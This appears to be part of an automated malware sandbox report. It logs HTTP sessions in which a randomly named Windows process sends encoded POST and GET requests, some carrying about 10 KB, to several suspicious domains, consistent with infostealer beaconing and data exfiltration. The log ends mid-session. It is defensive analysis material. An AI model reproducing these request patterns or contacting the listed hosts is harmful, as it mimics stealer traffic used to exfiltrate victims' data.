Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:47:29.288917065 CEST | 786 | OUT | POST /fava/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate
    Host: www.heldhold.xyz
    Origin: http://www.heldhold.xyz
    Content-Length: 224
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    Referer: http://www.heldhold.xyz/fava/
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
    Data Ascii: PR_xXrA=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjNQVnwCZPUxBobRXXn8jowt3J8JfC92J7wJ0pZQ3fEFfzQN/JPbJDOOjWJKogYn7EdTIP9QPN+Ce6w1wz6nLvJ5xcPjfrQEXv3gZqExqzSvNDDDNrfiKlQDb8LhvSCypvN+Spkbhlq3T7AyPJW4yaYE0TC/dJQsFYmub8Ib8i437p8=
Sep 25, 2024 12:47:29.889935017 CEST | 1236 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 25 Sep 2024 10:47:29 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Content-Length: 32106
    X-XSS-Protection: 1; mode=block
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Sep 25, 2024 12:47:29.889986038 CEST | 1236 | IN | Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
Sep 25, 2024 12:47:29.890003920 CEST | 1236 | IN | Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
Sep 25, 2024 12:47:29.890019894 CEST | 672 | IN | Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
Sep 25, 2024 12:47:29.890037060 CEST | 1236 | IN | Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables Navigation --><
Sep 25, 2024 12:47:29.890053988 CEST | 1236 | IN | Data Ascii: ables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true" aria-expanded="fal
Sep 25, 2024 12:47:29.890072107 CEST | 1236 | IN | Data Ascii: es </a> <ul class="dropdown-menu" aria-labelledby="sub-nav2"> <li><a class="dropdown-item dropdown-toggle" href="#">He
Sep 25, 2024 12:47:29.890085936 CEST | 104 | IN | Data Ascii: item dropdown-toggle" href="#">Header 2</a> <ul
Sep 25, 2024 12:47:29.890101910 CEST | 1236 | IN | Data Ascii: class="dropdown-menu"> <li><a class="dropdown-item" href="header2-transparent.html">Header 2 Transparent</a></li> <li><a cl
Sep 25, 2024 12:47:29.890119076 CEST | 224 | IN | Data Ascii: </ul> </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 4</a>
Sep 25, 2024 12:47:29.897145987 CEST | 1236 | IN | Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header4-transparent.html">Header 4 Transparent</a></li>


Session ID: 15
Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 67.223.117.189 | Destination Port: 80 | PID: 3368
Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe

Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:47:31.831346035 CEST | 10868 | OUT | POST /fava/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate
    Host: www.heldhold.xyz
    Origin: http://www.heldhold.xyz
    Content-Length: 10304
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    Referer: http://www.heldhold.xyz/fava/
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
    Data Ascii: PR_xXrA= [TRUNCATED]
Sep 25, 2024 12:47:32.412100077 CEST | 1236 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 25 Sep 2024 10:47:32 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Content-Length: 32106
    X-XSS-Protection: 1; mode=block
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Sep 25, 2024 12:47:32.412146091 CEST | 1236 | IN | Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
Sep 25, 2024 12:47:32.412180901 CEST | 1236 | IN | Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
Sep 25, 2024 12:47:32.412214041 CEST | 672 | IN | Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
Sep 25, 2024 12:47:32.412250042 CEST | 1236 | IN | Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables Navigation --><
Sep 25, 2024 12:47:32.412281036 CEST | 224 | IN | Data Ascii: ables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true"
Sep 25, 2024 12:47:32.412313938 CEST | 1236 | IN | Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
Sep 25, 2024 12:47:32.412348032 CEST | 1236 | IN | Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
Sep 25, 2024 12:47:32.412381887 CEST | 448 | IN | Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
Sep 25, 2024 12:47:32.412508011 CEST | 1236 | IN | Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
Sep 25, 2024 12:47:32.417418957 CEST | 1236 | IN | Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.44975367.223.117.189803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:34.367429972 CEST508OUTGET /fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.heldhold.xyz
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:47:34.943494081 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:47:34 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]


                                              Session ID: 17  Source IP: 192.168.2.4  Source Port: 49754  Destination IP: 103.248.137.209  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:47:40.290477991 CEST  Bytes transferred: 763  Direction: OUT  Data:
                                              POST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=+O2xfQVLDeWjZk4e+MvXkqlcT/Rvx533NiK5XW5WnR8EMCcClalcvXob+sirPQGPfCpBtoFPTBlKTbsmVe2AxB0c1Yq1anykqK27p3av2/VzUsXdwuZ+Xp8qNpuGFWtubgrWENnmzWMcasKVTuKL3G3/9o1EVZYZnGPedFDPz4whwr5QjpBAROd+I9Z6W2UU9g==


                                              Session ID: 18  Source IP: 192.168.2.4  Source Port: 49755  Destination IP: 103.248.137.209  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:47:42.846831083 CEST  Bytes transferred: 783  Direction: OUT  Data:
                                              POST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkMECDsCr7lcqXobwMiuBwGIfCVztoJPTFNKTacmWpCDxR0e64q3VHykqK27p0mF2/NzUdHdxMx9aJ8pd5uGO2tibgr0EI/AzU0capuVQ6eIi235zI1KUclTilKXD0HvsYEjxtoKyYgXDO5NV6QOb1pdmm+CVG2BxKor+bvKB0+Q1wY=


                                              Session ID: 19  Source IP: 192.168.2.4  Source Port: 49756  Destination IP: 103.248.137.209  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:47:45.392801046 CEST  Bytes transferred: 10865  Direction: OUT  Data:
                                              POST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA= [TRUNCATED]


                                              Session ID: 20  Source IP: 192.168.2.4  Source Port: 49757  Destination IP: 103.248.137.209  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:47:48.043497086 CEST  Bytes transferred: 507  Direction: OUT  Data:
                                              GET /5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.63582.photo
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36


                                              Session ID: 21  Source IP: 192.168.2.4  Source Port: 49758  Destination IP: 3.33.130.190  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:48:22.517416954 CEST  Bytes transferred: 787  Direction: OUT  Data:
                                              POST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=6ogxclRqCtxS3Bm9iM+bg04JcOovnjTDP5lH+fwHURhg8UN1BgnlIRynfKBePRKI82bJw316egZgzcISoeQDZ536+5f0Qsh2MvgOuA0NxWD2Xi/YpyI042qT17+13jLz31IFSMQpSKQ7obSaIJBV6gHR+X41DVc8eimcpOHQoUWnh2fpjiWPAJKwnAo4Uc2kOg==


                                              Session ID: 22  Source IP: 192.168.2.4  Source Port: 49759  Destination IP: 3.33.130.190  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:48:25.068850040 CEST  Bytes transferred: 807  Direction: OUT  Data:
                                              POST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVj1g/191AiPlExynUqBfRhKX82n3w2J6egNgzeQSopEcYp38xZeyeMh2MvgOuAxoxVz2LCPYrQg72WqQ27+19DL331JoSOkXSPM7ofWaZ4BWjQHX6X5iLWBmWynfoMGriXmekwOzyT3YSJuD6HhMZfLtVg7cMq/XFkbJ1TKv9unR6bo=


                                              Session ID: 23  Source IP: 192.168.2.4  Source Port: 49760  Destination IP: 3.33.130.190  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:48:27.613706112 CEST  Bytes transferred: 10889  Direction: OUT  Data:
                                              POST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA= [TRUNCATED]


                                              Session ID: 24  Source IP: 192.168.2.4  Source Port: 49761  Destination IP: 3.33.130.190  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:48:30.189023972 CEST  Bytes transferred: 515  Direction: OUT  Data:
                                              GET /kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.asiapartnars.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Timestamp: Sep 25, 2024 12:48:30.640738964 CEST  Bytes transferred: 401  Direction: IN  Data:
                                              HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 10:48:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 261
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh"}</script></head></html>


                                              Session ID: 25  Source IP: 192.168.2.4  Source Port: 49762  Destination IP: 3.33.130.190  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:48:35.869275093 CEST  Bytes transferred: 772  Direction: OUT  Data:
                                              POST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=YTqtiDoowBcpM3VpevMtPwDSUtq6ftyRU5ZT3x1PDOTgYjbYe+WfAzX3VPVyNWeUxYDfG7LwzBElaa/3v5Wfr+gBbcT1NRu12bJWkcn3FGQpwdyggmnunv3HGShHK2wIgIZ4ghkURWO77q4pw3AkJLf3qaB64n6tFAoqM/R9G5j3YxVWftvk7cpVvXS897i+Kw==


                                              Session ID: 26  Source IP: 192.168.2.4  Source Port: 49763  Destination IP: 3.33.130.190  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:48:38.423007011 CEST  Bytes transferred: 792  Direction: OUT  Data:
                                              POST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD83gYG/YRcufDzX3A/V3TmebxYf9G6nwzBglaez3oIWct+gPdcT3JRu12bJWkY2QFGIpwsCghEPt7/3ASChHbmwMgIYbgllcRU277qIpwmAnALfxl6A0xmr7NjFyBupzH5n1UXEMOcOzpcNmyQbIw4f3RyHiiwnNv2NWOEwZ66JDS7w=


                                              Session ID: 27  Source IP: 192.168.2.4  Source Port: 49764  Destination IP: 3.33.130.190  Destination Port: 80  PID: 3368  Process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp: Sep 25, 2024 12:48:40.968885899 CEST  Bytes transferred: 10874  Direction: OUT  Data:
                                              POST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA= [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              28 | 192.168.2.4 | 49765 | 3.33.130.190 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:48:43.515542030 CEST | 510 | OUT | GET /al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.linkwave.cloud
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:48:43.979209900 CEST | 401 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 10:48:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 261
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw="}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              29 | 192.168.2.4 | 49766 | 85.153.138.113 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:48:49.248893023 CEST | 766 | OUT | POST /3lu7/ HTTP/1.1
